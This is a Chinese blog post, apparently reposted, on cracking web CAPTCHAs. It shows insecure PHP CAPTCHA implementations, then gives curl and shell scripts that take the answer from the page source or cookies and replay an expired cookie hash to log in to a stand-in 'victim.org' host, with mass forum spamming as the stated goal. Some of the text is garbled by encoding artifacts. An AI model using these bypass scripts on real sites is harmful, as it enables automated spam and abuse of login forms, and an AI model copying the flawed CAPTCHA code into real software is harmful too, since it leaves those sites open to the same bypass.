首页 > 网络安全 > 加密解密

验证码破解技术

admin 加密解密 2022-02-17 09:59:27 加密解密技术   破解   验证   authnum   &quot   hash   &lt   服务器   使用"
所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息, 输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。 很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。 验证码在网页中的例子: CODE: <?
/*
* Filename: authpage.php
* Author: hutuworm
* Date: 2003-04-28
* @Copyleft hutuworm.org
*/ srand((double)microtime()*1000000); //验证用户输入是否和验证码一致
if(isset($HTTP_POST_VARS[’authinput’]))
{
if(strcmp($HTTP_POST_VARS[’authnum’],$HTTP_POST_VARS[’authinput’])==0)
echo "验证成功!";
else
echo "验证失败!";
}

//生成新的四位整数验证码
while(($authnum=rand()000)<1000);
?>


请输入验证码:


>
>%20 %20%20%20%20
%20 %20%20%20%20%20%20 [Copy%20to%20clipboard]%20 以上例子直接将验证码储存在负面中,只需下载页面,得到验证码值就可突破限制。%20 CODE:%20 #!/bin/sh%20 curl%20[url]http://www.vicitm.org/authpage.php[/url]%20 authinput=`grep%20’’%20grep.txt%20|%20sed%20-e%20’s/[^0-9]//g’`%20#得到网页中的%20 authnum%20 curl%20[url]http://www.vicitm.org/authpage.php[/url]%20-d%20name=hacker%20-d%20submit="验证"%20-d%20authnum=$authnum%20 [Copy%20to%20clipboard]%20 %20%20 CODE:%20 session_register("authnum");%20 $authnum%20=%20strval(rand("1111","9999"));%20 setcookie("authnum",$authnum);%20 ...%20 %20 ...%20 if($number%20!=%20$login_check_number%20||%20empty($number))%20 {%20 %20%20print("校验码不正确!");%20 %20%20die();%20 }%20 [Copy%20to%20clipboard]%20 第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。%20 CODE:%20 #!/bin/sh%20 $username=hacker%20 $password=hackme%20 curl%20[url]http://www.vicitm.org/index.php[/url]%20-c%20common_cookie%20%20%20%20%20%20%20#%20接受服务器的初始cookies%20 curl%20[url]http://www.vicitm.org/https://www.jb51.net/hack/get_code.php[/url]%20-c%20$username.cook%20-b%20common_cookie%20#%20得到验证码,从cookies中%20 authnum=`grep%20authnum%20$username.cook%20|%20cut%20-f7`%20 curl%20[url]http://www.victim.org/login.php[/url]%20-b%20$username.cook%20-d%20authnum=$authnum%20-d%20username=$username%20-d%20password=$password%20#%20使用%20 cookies中的验证码登陆%20 [Copy%20to%20clipboard]%20 更高级的验证码。(好像本论坛的就是这种。。。。)%20 有一类验证码比以上两种验证码要高级一些,它使用如下算法:%20 1。服务器生成一个随机hash。%20 2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。%20 3。hash在cookie中被发送到客户端%20 3。客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。%20 特点:因为攻击者不明白服务器所使用的验证码编码算法,所以无法对服务器转来的hash进行直接解析。%20 对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时%20 ,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。%20 如:%20 先从服务器上下载一张验证码图片:%20 curl%20http://www.victim.org/https://www.jb51.net/hack/get_code.php%20-c%20cookie%20-o%20auth.png
人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。
机器人突破验证时,扔掉服务器给的hash,强制使用$savecookie和$authnum进行突破
CODE: $savecookie=294b506f05f896dcbb3a0dde86a5e36c
$num=7701
$username=hacker
$password=hackme curl [url]http://www.victim.org/index.php[/url] -c $username.cookie # 得到初始化cookies,以及session id
grep -v authhash $username.cookie > tmp.$username # 扔掉服务器给你的hash
echo "[url]www.victim.org[/url] FALSE / FALSE 0 hash $savecookie" >> tmp.$username # 强行使用过期hash 和验证码
mv tmp.$username $username.cookie
curl [url]http://www.victim.org/login.php[/url] -b $username.cookie -c $username.cookie -d username=$username -d password=$password -d authnum=$num # 使用过期验证码登陆。
#登陆成功,去疯狂灌水。。。。。。 [Copy to clipboard]
最高级的验证码。
它使用如下方法:
1。服务器通过用户相关信息(IP,SID等等)生成一个随机hash。
2。使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。
3。hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以 是session id)
4。seq被作为cookies发送给客户端。
5。客户以图片输入验证码。
5。服务器验证方法:服务器并不检查f(hash)==验证码,而是去读取数据库中期望的验证码。。如果用户输入与期望值相同,则验证 成功。有些服务器可能还会seq与session id之间的关系进行验继续进行验证。
6。一旦用户进行了验证操作或重新获取验证码,而是服务器将对数据库中的hash值替换成新的,老值失效过期。 特点:
×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。
×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。 弱点:OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法进行正常验证)
对付这种验证码我没有什么好的方法,简便的方法就是自行下载验证码,并给用户显示后登陆。这种适用只验证一次的场合。如登陆时验证。
CODE: curl [url]http://www.victim.org/https://www.jb51.net/hack/get_code.php[/url] -c validate.png -c validcode_cookie # 得到验证码图片,和对应seq。
seq=`grep seq validcode_cookie | cut -f7`
echo -n 请输入validate.png中的验证码:
read valid_number # 输入验证码
# 登陆,并进行某种自动化操作,如疯狂灌水。
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/jiamijiemi/149873.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持